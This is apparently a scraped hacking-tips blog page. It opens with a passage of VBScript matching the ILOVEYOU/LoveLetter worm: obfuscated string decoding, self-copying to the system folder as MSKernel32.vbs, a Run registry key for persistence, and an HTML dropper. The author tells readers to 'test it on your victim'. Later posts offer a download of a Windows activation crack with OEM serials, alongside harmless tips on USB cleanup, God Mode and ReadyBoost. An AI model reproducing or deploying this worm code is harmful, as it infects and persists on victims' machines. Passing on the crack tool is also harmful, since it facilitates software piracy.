"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub


save this file as technosd.bat
AFTER SAVING DO NOT OPEN IT AT ALL.
FIRST TEST IT ON YUR VICTIM..
ENJOY !!!
LOLZZ>..
 

Remove viruses from your Pen drives

Remove viruses from your Pen drives 

Click Start-> run ->cmd->select your desired drive for eg:- f:->type dir/w/a this will show all the files in that drive.
Then type attrib -r -a -s -h *.*
this will remove any kind of restrictions on the file you wanna delete
Then type the file name to delete

the common types of viruses are
regsvr.exe
new folder.exe
ravmon.exe
autorun.inf

These are only a few that are actually visible..
My advice use a good antivirus also to be sure ...
 

Windows 8 transformation Pack version 3.0 || Full Version|| 11.5 mb

Windows 8 transformation Pack version 3.0 || Full Version|| 11.5 mb

Instructions
1. Download
2. Install and restart.

May have some bugs.

Download Link
http://cramit.in/1lhin6wpzy7e
 

Windows Loader v2.1.1 | Full Version | 1.57 MB

Windows Loader v2.1.1 | Full Version | 1.57 MB

The latest version now Activator activator / crack Microsoft Windows 7 / Vista / 2008, establishes a certificate of one of the firms (by choice), then activate your copy of Windows and allowsyou to authenticate.


Features of Windows 7 Loader By Daz:
* Checks the version of Windows
* Automatically detects the active boot partition
* Works in all languages
* Works with hidden partition
* Works on Windows 7, Vista and Server 2008 and other
* Support BIOS mod users
* Argument support automatic installations
* You can use this tool to activate Windows 7/Vista ISO, editing SetupComplete.cmd
* Improves Windows 7 boot Mac

Supported operating system, Windows 7 Loader By Daz:
• Windows 7 Ultimate
• Windows 7 Ultimate E
• Windows 7 Professional
• Windows 7 Professional E
• Windows 7 Home Premium
• Windows 7 Home Premium E
• Windows 7 Home Basic
• Windows 7 Starter Edition
• Windows 7 Starter E
• Windows Vista Ultimate
• Windows Vista Business
• Windows Vista Business N
• Windows Vista Home Premium
• Windows Vista Home Basic
• Windows Vista Home Basic N
• Windows Vista Starter
• Windows Server 2008 R2: Enterprise
• Windows Server 2008 R2: Standard
• Windows Server 2008 R2: Foundation
• Windows Server 2008: Enterprise
• Windows Server 2008: Standard
• Windows Server 2008: Foundation
• Windows Small Business Server 2008

Version 2.1.1 (04/03/2012)
* Fixed a bug that prevented existing SLIC's from being ignored
* Fixed a bug that caused Windows 8 serials to be decoded incorrectly
* Added Equus, Impression Computers and Xplore SLIC's and certificates
* Added Toshiba Windows 7 Ultimate serial
* Added Xplore Windows 7 Professional serial
* Added Impression Computers Windows 7 Home Premium serial
* Added LaCie Windows Server 2008 R2 Standard serial
* Added Western Digital Windows Storage Server 2008 R2 Essentials serial

Download Link
http://www.mediafire.com/?l2jrn8f7772x55g
Password is - www.sysfilm.com
 

Enable God Mode in Windows 7

Enable God Mode in Windows 7

* Create a New Folder.
* Rename it as " Hacking-Trick.{ED7BA470-8E54-465E-825C-99712043E01C} "
* Press "Enter".
* Your Done ... 

HAVING TROUBLE IN RUNNING YOUR PC ????

HAVING TROUBLE IN RUNNING YOUR PC ????

DOES YOUR PC .......WALKS ????? (RUNS SLOW) .........
THEN U HAVE THE SOLUTION AT YOUR HOME ... 
IN THIS POST :::: i'll be telling you How to Use your Pen-drive as a RAM for your PC.

* Plug a Pen-drive of more than 1 GB space in USB Port.
* Open My Computer and Right Click on the Icon of the inserted Pen-drive and Select "Properties".

* In the “Properties Task bar" go to “ReadyBoost” tab

* If you want to dedicate the entire space of your flash drive for ReadyBoost you can select the radio button that says “Dedicate this device to ReadyBoost”.

or

* If you want to use some of the Drive space as RAM then select the radio button "Use this device" and the select the space that you want to be used as RAM from "Space to reserve for system speed (may take lees than actual free space due to file system limits):" meter.

* Then Click "OK" to confirm and save your configurations